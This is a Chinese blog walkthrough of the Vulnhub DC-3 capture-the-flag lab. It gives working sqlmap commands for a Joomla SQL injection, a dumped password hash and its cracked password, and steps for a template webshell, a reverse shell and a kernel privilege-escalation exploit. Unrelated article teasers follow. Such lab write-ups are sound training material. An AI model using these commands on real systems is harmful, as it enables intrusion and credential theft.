Vulnhub-DC-3 靶机复现完整过程

啰嗦两句:
提权之前完成是一个月前做的,当时在提权处出了点问题就搁置了,今天才完成,所以IP地址可能会会有变化
注意:后续出现的IP地址为192.168.200.55同样是靶机IP地址,若本文能有帮助到你的地方,不胜荣幸。

一、搭建环境

1.工具

攻击机:kali(192.168.200.14)
靶机:dc-3 (暂时位置)

2.注意

攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式)

DC-1网络设计
点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别

二、信息收集

1.扫描同网段下的存活主机方法

靶机dc-3的MAC地址,根据MAC地址判断IP地址
image.png
其一:

arp-scan -l 

image.png
其二:

nmap -sP 192.168.200.0/24 -T4

image.png
其三:

natdiscover 

image.png

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.8 
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

image.png
可以看到此站点,只开启了80端口

3.扫描后台目录

利用dirsearch工具,可与看到administrator这个目录,应该是后台
image.png

4.指纹收集

登录网站
一个著名的CMS系统
image.png
左侧的英文翻译为:
这一次,只有1个flag,一个切入点,没有任何线索。 要获得该标志,您显然必须获得root权限(提权)。 你如何成为根取决于你——显然,还有系统。 祝你好运,我希望你喜欢这个小挑战 。

使用joomscan进行扫描

joomscan -u http://192.168.200.8/

joomscan 安装方法

sudo apt-get install joomscan

image.png
一般的:可以根据框架版本去百度搜索它相关的漏洞,先登录后台目录
image.png
百度搜索后,可以发现千篇一律的sql漏洞
image.png
利用KILI工具查找漏洞
image.png
查看文件、
image.png

5.后台爆破

image.png
sqlmap列出数据库库名
sqlmap -u “http://192.168.200.8/index.php ?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
根据提供的SQLmap构建的payload

image.png

sqlmap列出数据库joomladb下的所有表名
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
image.png
发现#_users表
列出users表的字段类型
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
#__users 里的信息
image.png
确定账户名 账号密码一般为“username,password”
爆数据
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username --dump
image.png

 $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #哈希加密

使用kali中的join工具进行解密

vi admin.txt      #编辑 将密文写入
john admin.txt    #破解

image.png
破解后得到登录密码为:snoopy 账号:admin
登录后台
image.png

三、漏洞探测

上传Webshell

可以找到网站源码,而模板里的php文件可编辑。
image.png
Joomla后台可编辑模板,利用这个功能,在template下面创建一个 test.php,写入一句话,蚁剑成功连接

image.png

image.png

image.png
当时上传一句话木马的路径如下,此时是可以浏览网站目录和打开虚拟终端的。
image.png

image.png
模板问及那所在路径(直接访问当前文件夹,均可以获取当前文件夹的内容)

http://192.168.200.8/templates/beez3/html/

image.png

反弹shell

在/templates/beez3模板里上传一个反弹shell的文件,记住上传路径,文件由自己创建,本文的文件名shell.php
image.png

反弹shell成功
image.png

利用EXP

searchsploit工具查找Ubuntu 16.04的提权,发现一个“拒绝服务漏洞”,可以用来提权

searchsploit ubuntu 16.04

image.png
查看漏洞,下载EXP

cp /usr/share/exploitdb/exploits/linux/local/39772.txt  shell.txt
cat shelll.txt

文件内容提供了EXP网址
image.png

下载(这步在靶机中实现,这步骤操作失误)
image.png
解压文件

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

image.png
image.png
image.png

提权

编译代码

./compile.sh   #执行脚本,编译文件

image.png
提权,获取root权限

./doubleput  #执行提权文件

略微等待一会儿
image.png
image.png

文章参考:https://blog.csdn.net/weixin_43583637/article/details/101554815

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/246413.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

k8s中的Pod

目录 1.1 创建一个pod 1.2 pod是如何被创建的 1.3 创建一个单容器pod 1.4 创建一个多容器pod 1.4.1 配置节点标签 1.5 Pod容器的交互 1.5.1 创建pod,并做本地解析 1.5.2 pod共享进程 1.5.2 pod共用宿主机namespace Pod 是可以在 Kubernetes 中创建和管理的、…

Redis设计与实现之字典

目录 一、字典 1、 字典的应用 实现数据库键空间 用作Hash类型键的其中一种底层实现 2、字典的实现 哈希表实现 哈希算法 3、创建新字典 4、添加键值对到字典 5、添加新元素到空白字典 6、添加新键值对时发生碰撞处理 7、添加新键值对时触发了 rehash操作 Note:什么…

Java 基础学习(九)API概述、Object、String、正则表达式

1 API概述 1.1 API概述 1.1.1 什么是API API(Application Programming Interface),意为:应用程序接口。API就是已经写好的的程序或功能,程序要需要时可以直接调用,无需再次编写。 API可以大致分为如下几类: 编程语…

【笔试强化】Day 2

文章目录 一、选择1.2.(写错)3.4.5.6.(不会)7.(不清晰)8. (不会)9.10.(写错) 二、编程1. 排序子序列解法:代码: 2. 倒置字符串解法&am…

STM32--中断使用(超详细!)

写在前面:前面的学习中,我们接触了STM32的第一个外设GPIO,这也是最常用的一个外设;而除了GPIO外,中断也是一个十分重要且常用的外设;只有掌握了中断,再处理程序时才能掌握好解决实际问题的逻辑思…

MyBatis之逆向工程

学习的最大理由是想摆脱平庸,早一天就多一份人生的精彩;迟一天就多一天平庸的困扰。各位小伙伴,如果您: 想系统/深入学习某技术知识点… 一个人摸索学习很难坚持,想组团高效学习… 想写博客但无从下手,急需…

IT圈茶余饭后的“鄙视链”

哈哈,IT圈的鄙视链,简直就是一出情感大戏!这个圈子里的人们总是忍不住要互相比较,互相鄙视,仿佛这是一场刺激的游戏,每个人都想要站在鄙视链的最顶端,成为那个最牛逼的存在。 首先,…

uniapp开发项目注意事项

uniapp创建项目用HBuilderX创建或者用脚手架命令创建都可以vue文件渲染h5,小程序很好nvue文件渲染原生app更好,注意nvue文件css的一些局限性,简称坑死人nvue所支持的通用样式已在本文档中全部列出,一些组件可能有自定义样式&#…

Docker网络模式:深度理解与容器网络配置

Docker 的网络模式是容器化应用中一个关键而复杂的方面。本文将深入讨论 Docker 的网络模式,包括基本概念、常用网络模式以及高级网络配置,并通过更为丰富和实际的示例代码,帮助读者全面掌握如何理解和配置容器网络。 Docker网络基础 1 Doc…

Pr自动从视频脚本剪辑视频FirstCut插件免费下载

FirstCut 插件将自动从视频脚本中剪辑视频,在例如新闻、采访、自媒体视频等带有配音或字幕内容的视频制作中提高了粗剪效率。 使用 FirstCut,大大缩短了粗剪的时间,而不是转到每个视频文件并找到 IN 点和 OUT 点,然后将其插入到序…

ubuntu install sqlmap

refer: https://github.com/sqlmapproject/sqlmap 安装sqlmap,可以直接使用git 克隆整个sqlmap项目: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2.然后进入sqlmap-dev,使用命令: python s…

改进了编排控制并增强了推理的可视性,Agents for Amazon Bedrock 现已上市

七月份的时候,我们推出了 Agents for Amazon Bedrock 预览版。如今,Agents for Amazon Bedrock 全面上市。 Agents for Amazon Bedrock 通过编排多步任务,有助于您加速生成人工智能 (AI) 应用程序的开发。代理使用基础…

@德人合科技——天锐绿盾|电脑文件防止泄密|文件、文档、图纸、源代码等透明加密保护,防泄密软件系统

德人合科技——天锐绿盾提供了一种企业办公电脑文件防止泄密的解决方案,该方案对文件、文档、设计图纸、源代码等进行了透明加密保护。 pc访问地址: https://isite.baidu.com/site/wjz012xr/2eae091d-1b97-4276-90bc-6757c5dfedee 透明加密是一种保护文…

Qt 表格相关API

1.文本框 限制输入数据类型(如仅英文) QValidator* validator new QRegExpValidator(QRegExp("[a-zA-Z]"), lineText); // 创建正则表达式验证器lineText->setValidator(validator); // 将验证器设置给 QLineEdit QLineEdit:单…

Python接口自动化 —— Json 数据处理实战(详解)

简介   上一篇说了关于json数据处理,是为了断言方便,这篇就带各位小伙伴实战一下。首先捋一下思路,然后根据思路一步一步的去实现和实战,不要一开始就盲目的动手和无头苍蝇一样到处乱撞,撞得头破血流后而放弃了。不仅…

百元买百鸡问题

#include<stdio.h> void printf(){int z, i, j, t 0;for (i 0; i <20; i){for (j 0; j < 33; j){z 100 - i - j;if ((z % 3 0) && (i * 5 j * 3 z / 3 100)){t;printf("公鸡的个数%d 母鸡的个数%d 小鸡个数%d", i, j, z);printf(&quo…

《使用ThinkPHP6开发项目》 - ThinkPHP6使用JWT验证登录Token

《使用ThinkPHP6开发项目》 - 登录接口三【表单验证】-CSDN博客 上面说到的使用 JWT生成Token&#xff0c;现在来说下如何使用JWT验证登录Token 1&#xff09;在app\common.php文件中引入JWT验证文件 #app\common.php use Firebase\JWT\Key; use Firebase\JWT\SignatureInva…

从开源项目中学习如何自定义 Spring Boot Starter 小组件

前言 今天参考的开源组件Graceful Response——Spring Boot接口优雅响应处理器。 具体用法可以参考github以及官方文档。 基本使用 引入Graceful Response组件 项目中直接引入如下maven依赖&#xff0c;即可使用其相关功能。 <dependency><groupId>com.feiniaoji…

电信网关配置管理系统后台 upload.php 文件上传漏洞复现

0x01 产品简介 中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。 0x02 漏洞概述 电信网关配置管理系统后台 /manager/teletext/material/upload.php 接口存在文件上传漏洞,攻击者…

在IDEA中使用Git 、远程仓库克隆工程到本地

4.1 在IDEA中配置Git 安装好IntelliJ IDEA后&#xff0c;如果Git安装在默认路径下&#xff0c;那么idea会自动找到git的位置&#xff0c;如果更改了Git的安装位置则需要手动配置下Git的路径。 选择File→Settings打开设置窗口&#xff0c;找到Version Control下的git选项&…